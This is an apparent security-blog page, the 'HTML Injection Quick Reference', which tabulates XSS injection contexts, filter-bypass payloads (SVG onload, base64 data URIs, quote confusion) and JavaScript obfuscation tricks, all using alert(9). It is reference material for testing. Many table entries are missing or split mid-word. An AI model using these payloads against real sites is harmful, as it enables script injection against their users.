HTML Injection

Some articles on HTML Injection and XSS:
– When a payload travels from a URL parameter to a cookie and back again, say farewell to your security.
– An attack is persistent when the payload continues to be reflected after only being injected once; kind of like how user-tracking uses cookies to keep a persistent profile on you.
– Browsers may be more tolerant of an injection payload than your security filters.
– A vulnerable web app may already have all the libraries you need to summon exploit code from somewhere else.
– Preserve a script block’s syntax when injecting into JavaScript. Use a payload that maintains correct syntax; don’t let an error in the browser’s parser prevent your hack from working. And take a logical approach to crafting the attack.
– A walk-through of a simple injection attack. And an equally simple attack that injects a payload across two URL parameters.
– An example of how Content Security Policy counters HTML injection attacks so that JavaScript is Harmless.
– How a tricky payload bypassed a countermeasure that inadequately escaped JavaScript metacharacters.
– Comparing a coding weakness vs. an exploitable vuln.
– Read the introduction to the HIQR.

HTML Injection Quick Reference (HIQR)

Table 1: Injection Techniques for Various Parsing Contexts

Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation

Table 3: JavaScript Compositions for Manipulation & Obfuscation

Injection Techniques for Various Parsing Contexts1
Context State Injection Example
Data State
(Text node, open tag)

Welcome back,


<title>Search Results for ‘</title>☣





Attribute value


<input type=text name=foo value=a>☣>






JavaScript variable assignment



var foo=”“;☣;//“;


var foo=’‘;☣;//‘;

JavaScript Window.location object property


document.write(“Page not found: ” + window.location);




$(document).ready(function() {
  var x = (window.location.hash.match(/^#([^\/].+)$/) || [])[1];
  var w = $(‘a[name=”‘ + x + ‘”], [id=”‘ + x + ‘”]’);


1 The biohazard symbol (U+2623) — ☣ — in each example represents a JavaScrip
t payload. It could be anything from a while loop to DoS the browser, e.g. var a;while(1){a+=”a”} to the ubiquitous
alert(9). These categories focus on the placement of the payload within the rendered document rather than the effect
of the payload.

Though it seems daunting to review the HTML5 syntax specification, doing so aids in u
nderstanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for par
sing HTML documents
. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Ag
ent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus rem
oving a historical source of insecurity. The HTML4 spec was not as clear or as rigourous on parsing.

2 Sometimes it’s helpful to insert a space before the –> to ensure the tag is in
terpreted. [ HTML5 comments ]

3 This is a quirk of jQuery’s design choice for overloading the $() API to accept selectors or elements. Read about the interplay of JavaScript and Content Security Policy on the blog.

Payload Crafting Techniques to Bypass Filters and Data Validation


Payload Example
Alternate attribute delimiters

Forward slash

Dangling quoted string



CRLF instead of space

JavaScript inline event handlers1
[ html4 | html5 ]







HTML5 autofocus


Data URI handlers2

src & href attributes


Base64 data

<a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg”>foo</a>

Alternate character sets

<a href=”data:text/html;charset=utf-16,

Alternate markup


<svg onload=”javascript:alert(9)” xmlns=””></svg>

<svg xmlns=””>
<g onload=”javascript:alert(9)”></g></svg>


<svg xmlns=””>
<a xmlns:xlink=”” xlink:href=”javascript:alert(9)”>
<rect width=”1000″ height=”1000″ fill=”white”/></a></svg>

Untidy markup

Missing greater-than sign


Recover from syntax error

<a href=””&<img&amp;/onclick=alert(9)>foo</a>

Uncommon syntax

<a””id=a href=”onclick=alert(9)>foo</a>

Orphan entity

<a href=””&amp;/onclick=alert(9)>foo</a>

Vestigal attribute


Anti-regex patterns

Element closed prematurely

<img src=”>”onerror=alert(9)>

Element confusion

<img id=”><“class=”><“src=”>”onerror=alert(9)>

Quote confusion

<img src=”\”a=”>”onerror=alert(9)>

<a id=’ href=””>’href=javascript:alert(9)>foo</a>

<a id=’href=’onclick=alert(9)>foo</a>

<a href= . ‘”\’ onclick=alert(9) ‘”‘>foo</a>

Quote confusion with element

<img src=”\”‘<a href='”>”‘onerror=alert(9)>

<a id=’’onclick=alert(9)<!–href=a>foo</a>–>

Quote mixing with element

<img src=”‘”id='<img src=””>’onerror=alert(9)>

Recursive elements

<img src=”<img src='<img src=.>’>”onerror=alert(9)>

Repeated attributes (match last occurrence)3

<a href=javascript:alert(9) href href=” href=””>foo</a>


1 HTML5’s Content Security Policy headers can neutralize these attacks by preventing the User Agent from executing JavaScript within this context unless the page author is forced to include the “unsafe-inline” directive.

2 The basic format is dataurl := “data:” [ mediatype ] [ “;base64” ] “,” data. The scheme is defined in RFC 2397.

3 Per HTML5 spec, “When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”
JavaScript Compositions for Manipulation & Obfuscation



String operators

var a = “foo“+alert(9)//“;

Logical operators

var a = “foo“&&alert(9)//“;

Mathematical operators

var a = “foo“/alert(9)//“;

Function execution



Method lookup



String object


Regex object source attribute

alert(/foo bar/.source)


Harness functions from a JavaScript library


angular.bind(self, alert, 9)()


Ember JS, alert, 9)


_.defer(alert, 9)

_.delay(alert, 0, 9)


Type coercion

1) Boolean + Object to String

false + “” = “false”

![] + []

2) String by index to character

( false + “” )[1] = “a”

( ![] + [] )[1]

3) Compose string


(![]+[])[1] +
(![]+[])[2] +
(![]+[])[4] +
(!![]+[])[1] +

4) Function by method lookup


(window[(![]+[])[1] + (![]+[])[2] + (![]+[])[4] +
(!![]+[])[1] + (!![]+[])[0]])(9)


Creative Commons License
This HTML Injection Quick Reference (HIQR) is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.

6 thoughts on “HTML Injection”

Leave a Reply

Please log in using one of these methods to post your comment: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s